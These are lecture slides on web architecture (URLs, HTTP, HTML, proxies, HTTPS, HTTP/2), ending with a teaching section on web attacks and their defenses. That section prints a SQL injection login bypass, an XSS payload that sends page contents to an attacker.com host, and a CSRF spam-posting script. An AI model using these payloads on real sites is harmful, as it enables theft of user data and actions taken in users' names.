Web Fundamentals
Web Architecture & Technologies

Ruben Verborgh, Ghent University, imec, IDLab

#WebDev2017

Except where otherwise noted, the content of these slides is licensed under a Creative Commons Attribution 4.0 International License.

The Web seems an “evident” extension
of the Internet.

What is so special about
the invention of the Web?

This flyer predates the Web’s boom.
What is missing?

[A flyer with instructions on how to obtain files through a mailserver and FTP server.]

The Web actually consists of
3 separate—but connected—inventions.

[A circle diagram connecting URL, HTTP, and HTML.]

A Web URL uniquely identifies and locates a resource anywhere in the universe.

A (well-chosen) URL combines
identification and location.

http://en.wikipedia.org/wiki/Marissa_Mayer

Deceptively simple, the URL is probably the most revolutionary part of the Web.

The generic URL syntax
extends beyond the Web.

<scheme>:<scheme-specific-part>

The uniform structure of an HTTP URL
includes the following parts.

http://<host>/<path>?<search>#<fragment>

hostname
identifies the machine
path
identifies the resource within the machine
search
optionally refines the resource
fragment
optionally identifies a part of the resource

Applied to an example URL,
these parts are as follows.

http://en.wikipedia.org/wiki/Marissa_Mayer#Career

hostname
the machine is en.wikipedia.org
path
the resource is /wiki/Marissa_Mayer
search
not present
fragment
the part of the resource is Career
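
As a minimal sketch, the same decomposition can be reproduced with Python's standard urllib.parse module. The variable name is an assumption made for illustration only.

```python
from urllib.parse import urlsplit

# Split the example URL from the slide into its generic components.
parts = urlsplit("http://en.wikipedia.org/wiki/Marissa_Mayer#Career")

print(parts.scheme)    # the scheme
print(parts.hostname)  # the host
print(parts.path)      # the path
print(parts.query)     # the search part (an empty string when absent)
print(parts.fragment)  # the fragment
```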

An HTTP URL provides the instructions
to obtain a representation of the resource.

http://<host>/<path>?<search>#<fragment>

http://en.wikipedia.org/wiki/Marissa_Mayer#Career

  1. The client looks up the IP address of en.wikipedia.org.
    • This address is 91.198.174.192.
  2. The client requests /wiki/Marissa_Mayer.
    • The server generates the corresponding Wikipedia article.
  3. The client finds #Career in the received document.
    • This corresponds to a heading in the HTML document; the fragment itself is never sent to the server.

The URL became part of a family
of technologies related to identification.

The broadest family is IRI,
which supports non-ASCII characters.
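
One way to picture the relation between an IRI and a plain ASCII URL is the conversion below. It is only a sketch: the function names and the sample path and host are hypothetical, and it covers just the path and host parts.

```python
from urllib.parse import quote

def iri_path_to_uri_path(path: str) -> str:
    """Percent-encode the UTF-8 bytes of non-ASCII characters in a path."""
    return quote(path, safe="/")

def iri_host_to_uri_host(host: str) -> str:
    """Convert an internationalized host name to its ASCII (IDNA) form."""
    return host.encode("idna").decode("ascii")

print(iri_path_to_uri_path("/wiki/Zoë"))
print(iri_host_to_uri_host("bücher.example"))
```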

HTTP is a protocol to transfer representations from a server to a client.

After resolving the server’s IP address,
the client can send an HTTP request.

To obtain http://en.wikipedia.org/wiki/Marissa_Mayer, the client connects to 91.198.174.192 on TCP port 80, and sends this request:

GET /wiki/Marissa_Mayer HTTP/1.1
Host: en.wikipedia.org
User-Agent: MyBrowser/1.0
Accept: text/html
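
The request above can be derived mechanically from the URL. The following sketch assumes a hypothetical helper name, build_get_request, and only builds the request text without opening a connection.

```python
from urllib.parse import urlsplit

def build_get_request(url: str, user_agent: str = "MyBrowser/1.0") -> str:
    parts = urlsplit(url)
    # The request target is the path plus the optional search part;
    # the fragment stays on the client.
    target = parts.path or "/"
    if parts.query:
        target += "?" + parts.query
    lines = [
        f"GET {target} HTTP/1.1",
        f"Host: {parts.netloc}",
        f"User-Agent: {user_agent}",
        "Accept: text/html",
        "",  # an empty line ends the header section
        "",
    ]
    return "\r\n".join(lines)

request = build_get_request("http://en.wikipedia.org/wiki/Marissa_Mayer#Career")
print(request)
```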

HTTP has a limited number of methods.
The following 5 are widely known.

GET
transfer a representation
HEAD
transfer only status and headers
POST
perform a resource-specific operation
PUT
replace all representations
DELETE
remove all representations

An HTTP method is safe
if it is read-only.

An HTTP method is idempotent
if repetitions don’t alter the outcome.
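
The two properties can be tabulated for the five methods listed earlier. The in-memory store and the put and post helpers below are hypothetical and exist only to show what "repetitions don't alter the outcome" means.

```python
# Safety and idempotence of the five methods, as defined by the HTTP specification.
METHODS = {
    "GET":    {"safe": True,  "idempotent": True},
    "HEAD":   {"safe": True,  "idempotent": True},
    "POST":   {"safe": False, "idempotent": False},
    "PUT":    {"safe": False, "idempotent": True},
    "DELETE": {"safe": False, "idempotent": True},
}

store = {}  # hypothetical resource store: path -> representation

def put(path, body):
    store[path] = body  # repeating this leaves the store in the same state

def post(collection, body):
    path = f"{collection}/{len(store) + 1}"
    store[path] = body  # repeating this creates yet another resource
    return path

put("/messages/1", "hello")
put("/messages/1", "hello")
after_two_puts = dict(store)

post("/messages", "hi")
post("/messages", "hi")
after_two_posts = dict(store)
```

Every safe method is also idempotent, but not the other way around: PUT and DELETE change state, yet repeating them does not change it further.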

Clients send the hostname,
so one server can host multiple websites.

When a server receives a request,
it generates a response.

In response to our previous request:

HTTP/1.1 200 OK
Date: Thu, 18 Feb 2016 09:30:46 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Sun, 24 Jan 2016 18:26:27 GMT

<!DOCTYPE html>
<html lang="en" dir="ltr" class="client-nojs">
…
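
A client reads such a response by splitting off the status line, the headers, and the body. The parser below is a simplified sketch (the function name is an assumption, and real clients handle many more cases), applied to an abbreviated copy of the response.

```python
def parse_response(raw: str):
    # An empty line separates the head from the body.
    head, _, body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    version, code, reason = status_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()  # header names are case-insensitive
    return int(code), reason, headers, body

raw = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Last-Modified: Sun, 24 Jan 2016 18:26:27 GMT\r\n"
    "\r\n"
    "<!DOCTYPE html>"
)
status, reason, headers, body = parse_response(raw)
```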

HTTP has 5 categories of status codes
to indicate how the request was handled.

100–199
info – the client may continue
200–299
success – request understood & accepted
300–399
redirection – further action is needed
400–499
client error – the request cannot be fulfilled
500–599
server error – the server failed to fulfill a valid request

A couple of these status codes
are very commonly encountered.

200
OK (“default”)
301
Moved Permanently
404
Not Found
500
Internal Server Error
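
Because the first digit determines the category, a client can classify any status code, even one it does not know. A small sketch, in which the CATEGORIES table and the category function are illustrative names:

```python
from http import HTTPStatus

CATEGORIES = {
    1: "info",
    2: "success",
    3: "redirection",
    4: "client error",
    5: "server error",
}

def category(code: int) -> str:
    """Derive the category from the first digit of the status code."""
    return CATEGORIES[code // 100]

for code in (200, 301, 404, 500):
    print(code, HTTPStatus(code).phrase, "-", category(code))
```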

HTTP status ranges in a nutshell:
1xx: hold on
2xx: here you go
3xx: go away
4xx: you fucked up
5xx: I fucked up

Steve Losh, August 28, 2013

HTML is a markup language that
captures the structure of documents.

An element consists of its tags, attributes, and child nodes (elements and/or text).

This is a fragment of an HTML document.

<main>
  <h1>This is a title.</h1>
  <p id="introduction" class="summary">
    This is a paragraph<br/>
    with <em>emphasized</em> words.
  </p>
  <img src="image.jpg" alt="an image" />
</main>
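
To see the elements and attributes in this fragment, it can be fed to Python's standard html.parser module. The ElementLister class is a hypothetical helper that only records start tags in document order.

```python
from html.parser import HTMLParser

class ElementLister(HTMLParser):
    def __init__(self):
        super().__init__()
        self.elements = []  # (tag name, attribute dict) in document order

    def handle_starttag(self, tag, attrs):
        self.elements.append((tag, dict(attrs)))

fragment = """
<main>
  <h1>This is a title.</h1>
  <p id="introduction" class="summary">
    This is a paragraph<br/>
    with <em>emphasized</em> words.
  </p>
  <img src="image.jpg" alt="an image" />
</main>
"""

lister = ElementLister()
lister.feed(fragment)
lister.close()
for tag, attributes in lister.elements:
    print(tag, attributes)
```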

The HTML specification restricts
what elements can be used and where.

HTML documents can contain hyperlinks
and other hypermedia controls.

HTML documents can embed or use
other media documents.

HTML is intended for markup,
not for makeup.

The Web supports an immense variety
of different clients.

All clients need to support
a couple of core technologies.

Browsers offer an interactive environment
for general-purpose website consumption.

Web applications perform HTTP requests
using browser scripting functionality.

Desktop and mobile applications
can similarly create HTTP requests.

Crawlers process and/or index webpages,
and follow links to others.

The HTTP protocol does not attach
meaning to URL paths and query strings.

Even though you might attach meaning to a URL like
http://example.org/products/guitars.html?brand=gibson,
such an interpretation is not specified.

In particular, slashes do not necessarily indicate folders;
a dot does not necessarily signal an extension.

The server might just have used this URL instead:
http://example.org/products-guitars?html%2Fbrand.gibson
and it might very well point to an image.

Web servers exist in many kinds and
have many possible implementations.

A static file server maps HTTP URLs
to internal file URLs.
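
Such a mapping might look like the sketch below. The document root /var/www and the function name are assumptions, and a real file server would add many more checks.

```python
from pathlib import PurePosixPath
from urllib.parse import unquote, urlsplit

def url_to_file_path(url: str, document_root: str = "/var/www"):
    """Map the path of an HTTP URL to a file path below the document root."""
    path = unquote(urlsplit(url).path)
    parts = [p for p in PurePosixPath(path).parts if p != "/"]
    if ".." in parts:
        return None  # refuse attempts to escape the document root
    return str(PurePosixPath(document_root, *parts))

print(url_to_file_path("http://example.org/products/guitars.html"))
print(url_to_file_path("http://example.org/../etc/passwd"))
```

This mapping is a choice made by the server, not something the URL itself prescribes.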

An application server uses server-side code
to generate pages on demand.

Several intermediaries may exist
between a client and a server.

[Diagram showing a client connected to a server through several intermediaries.]

In contrast to many other protocols,
HTTP enables transparent intermediaries.

This is not as easy with other protocols.
For example, let’s assume Java RMI.

remoteObject.getMessage(234);
remoteObject.getMessage(234);
remoteObject.deleteMessage(234);

If a proxy server is inserted before the remote server,
may it cache the result of getMessage? If so, how long?

HTTP can be transparent because of
its standardized uniform interface.

The standardized method semantics
are crucial to make caching work.
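
Because an intermediary knows what GET and DELETE mean for every resource, it can cache without knowing the application. The toy proxy below is only a sketch: the class, the origin callable, and the paths are hypothetical, and real caches also honor expiry and cache-control headers.

```python
class CachingProxy:
    """Toy intermediary: caches GET responses and forwards everything else."""

    def __init__(self, origin):
        self.origin = origin  # callable(method, path) -> response body
        self.cache = {}

    def request(self, method, path):
        if method == "GET":
            if path not in self.cache:
                self.cache[path] = self.origin(method, path)
            return self.cache[path]
        # Unsafe methods may change the resource, so drop any cached copy.
        self.cache.pop(path, None)
        return self.origin(method, path)

calls = []

def origin(method, path):
    calls.append((method, path))
    return f"response {len(calls)}"

proxy = CachingProxy(origin)
first = proxy.request("GET", "/messages/234")
second = proxy.request("GET", "/messages/234")   # answered from the cache
proxy.request("DELETE", "/messages/234")          # invalidates the cached copy
third = proxy.request("GET", "/messages/234")     # fetched from the origin again
```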

Intermediaries can play different roles
in an HTTP interaction.

caching
to improve performance and availability
security
to handle authorization and authentication
routing
to redirect toward the right server
load balancing
to distribute load over servers
anonymizing
to bypass identification or logging

Depending on their position in the network,
proxies are forward or reverse.

Only one process on a device can listen on TCP port 80.
A reverse proxy lets that device run many servers.

The proxy interfaces with app servers
through other, non-public TCP ports.
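
The routing decision of such a reverse proxy can be sketched as a lookup on the Host header. The host names and port numbers below are made up for illustration.

```python
# Hypothetical mapping from public host names to internal (address, port) pairs.
BACKENDS = {
    "blog.example.org": ("127.0.0.1", 3000),
    "shop.example.org": ("127.0.0.1", 3001),
}

def choose_backend(host_header: str):
    """Pick the internal app server for the Host header of a request."""
    host = host_header.split(":")[0].lower()  # ignore an explicit port
    return BACKENDS.get(host)

print(choose_backend("blog.example.org"))
print(choose_backend("shop.example.org:80"))
```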

Caching can happen virtually anywhere—
and we don’t always know.

[Diagram showing a client connected to a server through several intermediaries.]

The notion of “client” and “server”
is relative to the interaction.

[Diagram showing an intermediary in the role of both client and server.]

HTTP nodes send plaintext over TCP,
which means intermediaries can read it.

The Web needs to be a safe
and trusted environment for all.

HTTPS is a secure extension
of the HTTP protocol.

HTTPS can be applied in
different parts of the network.

Consider the common use case in which
an application server lives behind a reverse proxy.

Setting up HTTPS involves requesting,
installing, and maintaining a certificate.

HTTPS URLs are different,
so clients know what protocol to use.
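
A client can read the protocol choice directly from the scheme of the URL. In this sketch, the function name and the returned tuple are assumptions. Ports 80 and 443 are the standard defaults for http and https.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}

def connection_plan(url: str):
    """Return (host, port, use_tls) for an http or https URL."""
    parts = urlsplit(url)
    port = parts.port or DEFAULT_PORTS[parts.scheme]
    return parts.hostname, port, parts.scheme == "https"

print(connection_plan("http://en.wikipedia.org/wiki/Marissa_Mayer"))
print(connection_plan("https://en.wikipedia.org/wiki/Marissa_Mayer"))
```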

Informing users about security in the UI
is an important part of a safer Web.

Most browsers indicate HTTPS in the address bar.

[“Secure” indication in the address bar]

Some browsers such as Chrome
campaign for an all-HTTPS Web.

[current treatment of regular HTTP pages in Chrome] [future treatment of regular HTTP pages in Chrome]

The Web has been pushing HTTP’s limits,
so an update was due.

This section is based on http2 explained
by Daniel Stenberg, creator of curl.

Webpages consist of more and more items,
and those items keep getting larger.

Several limitations of HTTP have
a negative impact on page load times.

Many websites use(d) workarounds
to circumvent HTTP’s limitations.

inlining
Embed scripts, images, and/or styles inside HTML documents instead of linking them to reduce the number of items.
concatenation
Combine several scripts, images, or styles into a single file.
sharding
Distribute resources across different domains to bypass connection restrictions.

HTTP/2 set out a couple of
important goals for improvement.

HTTP/2 is a binary protocol that sends
frames over multiplexed streams.
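
Every HTTP/2 frame starts with a 9-byte binary header: a 24-bit payload length, an 8-bit type, 8 bits of flags, and a reserved bit followed by a 31-bit stream identifier. The sketch below packs and unpacks that header. The helper names and payloads are illustrative, and the example is simplified: a real exchange begins each stream with a HEADERS frame.

```python
import struct

DATA, HEADERS = 0x0, 0x1  # two of the frame types defined by HTTP/2
END_STREAM = 0x1          # flag marking the last frame of a stream

def pack_frame(frame_type, flags, stream_id, payload=b""):
    """Build one frame: the 9-byte header followed by the payload."""
    length = struct.pack(">I", len(payload))[1:]  # keep the low 24 bits
    rest = struct.pack(">BBI", frame_type, flags, stream_id & 0x7FFFFFFF)
    return length + rest + payload

def unpack_header(frame):
    """Read (length, type, flags, stream id) from the first 9 bytes."""
    length = int.from_bytes(frame[0:3], "big")
    frame_type, flags, stream_id = struct.unpack(">BBI", frame[3:9])
    return length, frame_type, flags, stream_id & 0x7FFFFFFF

# Frames of two streams (ids 1 and 3) interleaved on a single connection.
connection = [
    pack_frame(DATA, 0, 1, b"part of response A"),
    pack_frame(DATA, END_STREAM, 3, b"all of response B"),
    pack_frame(DATA, END_STREAM, 1, b"rest of response A"),
]
for frame in connection:
    print(unpack_header(frame))
```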

In practice, HTTP/2 always runs over TLS,
even though the standard also allows cleartext TCP.

Protocol-level security is insufficient
to provide application-level security.

We will examine 3 common attack types
and how to defend against them.

code injection
executing malicious scripts on the server
cross-site scripting
executing malicious scripts on the client
cross-origin access
accessing information from other websites

With code injection, clients send input
designed to execute on the server.

attack
executable code passed in a URL or POST body parameter
cause
improper input validation by the server
defense
never trust raw client input
validate input ranges
escape values before passing to scripts

SQL injection used to be
a very common type of attack.

Server-side code

query = "SELECT id FROM User WHERE name='" + name + "'" +
        " AND password='" + password + "'";

Client-side code

[A login form submitted with name admin and password ' OR ''=']

Result

SELECT id FROM User WHERE name='admin'
                    AND password='' OR ''='';
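
The effect, and one common defense, can be tried out with Python's built-in sqlite3 module. This is a sketch under assumptions: the table layout and the stored password are invented, and the malicious input is the one implied by the resulting query above.

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE User (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
# A plaintext password only mirrors the slide; real systems store salted hashes.
db.execute("INSERT INTO User (name, password) VALUES ('admin', 'secret')")

name, password = "admin", "' OR ''='"  # malicious input

# Vulnerable: the input is pasted into the SQL text and changes its structure.
unsafe_query = ("SELECT id FROM User WHERE name='" + name + "'" +
                " AND password='" + password + "'")
unsafe_rows = db.execute(unsafe_query).fetchall()

# Safer: placeholders keep the input as data, never as SQL.
safe_rows = db.execute(
    "SELECT id FROM User WHERE name=? AND password=?", (name, password)
).fetchall()

print(unsafe_rows)  # the attacker is matched to the admin row
print(safe_rows)    # no row matches the literal password
```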

Client-side validation only offers usability;
servers always need to (re-)validate.

Client-side form

Ways to bypass

Client-side-only validation in the real world

With Cross-Site Scripting (XSS), a client-side script steals information from a webpage.

attack
trick another site into executing code in its own space, exposing or changing user data
causes
improper input validation
trusting third-party content
social engineering
defense
validate input
add token field on forms

Injecting JavaScript in pages
can steal a user’s personal data.

Original page echoes assets in contents

https://mybank.com/onlinebanking/?search=assets

Attack code

(xhr = new XMLHttpRequest()).open('GET',
  'http://attacker.com/?data=' + document.body.innerHTML);
xhr.send(null);

Modified URL echoes the attack code in contents

https://mybank.com/onlinebanking/?search=%3Cscript%3E(xhr%20%3D%20new
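
A server that escapes the echoed value renders the attack harmless. The page template and function name below are hypothetical. html.escape is part of Python's standard library.

```python
from html import escape

def render_search_page(search: str) -> str:
    # Escape the user-supplied value before echoing it into the HTML.
    return "<p>Results for: " + escape(search) + "</p>"

page = render_search_page("<script>alert(1)</script>")
print(page)
```

The browser then displays the script as text instead of executing it.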

Submitting a form to another site
can execute actions on a user's behalf.

Attack code placed on third-party website

(xhr = new XMLHttpRequest()).open('POST',
  'http://reddit.com/?message=Cheap%20Pills%20For%20Sale');
xhr.send(null);

Cross-Site Request Forgery (CSRF) Prevention

<input name="csrf" type="hidden" value="XVduuls7" />
<input name="message" type="text"/>
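
On the server, such a token is typically generated per session and checked on every form submission. A minimal sketch, assuming a hypothetical in-memory session store and function names:

```python
import hmac
import secrets

sessions = {}  # hypothetical server-side store: session id -> CSRF token

def issue_token(session_id: str) -> str:
    """Create an unpredictable token to embed in the hidden form field."""
    token = secrets.token_urlsafe(16)
    sessions[session_id] = token
    return token

def is_valid_submission(session_id: str, submitted: str) -> bool:
    """Accept the form only if it carries the token issued for this session."""
    expected = sessions.get(session_id)
    if expected is None:
        return False
    # Constant-time comparison avoids leaking information through timing.
    return hmac.compare_digest(expected.encode(), submitted.encode())

token = issue_token("session-1")
```

A third-party page cannot read the token, so the request it forges is rejected.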

With cross-origin access, a page requests third-party resources through JavaScript.

attack
request resources from another site with JavaScript and read their contents
causes
the existence of XMLHttpRequest
being logged in on another website
defense
browsers block cross-origin requests by default

Cross-origin requests are a problem
within browsers only.

Cross-Origin Resource Sharing (CORS) enables others to access your pages.
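
With CORS, the server opts in by adding response headers that tell the browser which origins may read the response. The allow-list and function below are assumptions made for this sketch.

```python
ALLOWED_ORIGINS = {"https://app.example.org"}  # hypothetical trusted origin

def cors_headers(request_headers: dict) -> dict:
    """Return the extra response headers for a cross-origin request."""
    origin = request_headers.get("Origin")
    if origin in ALLOWED_ORIGINS:
        # Vary tells caches that the response depends on the Origin header.
        return {"Access-Control-Allow-Origin": origin, "Vary": "Origin"}
    return {}  # without the header, the browser keeps blocking access

print(cors_headers({"Origin": "https://app.example.org"}))
print(cors_headers({"Origin": "https://attacker.example"}))
```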

Users spend most of their time on other sites.

This means that users prefer your site to work the same way as all the other sites they already know.

Jakob Nielsen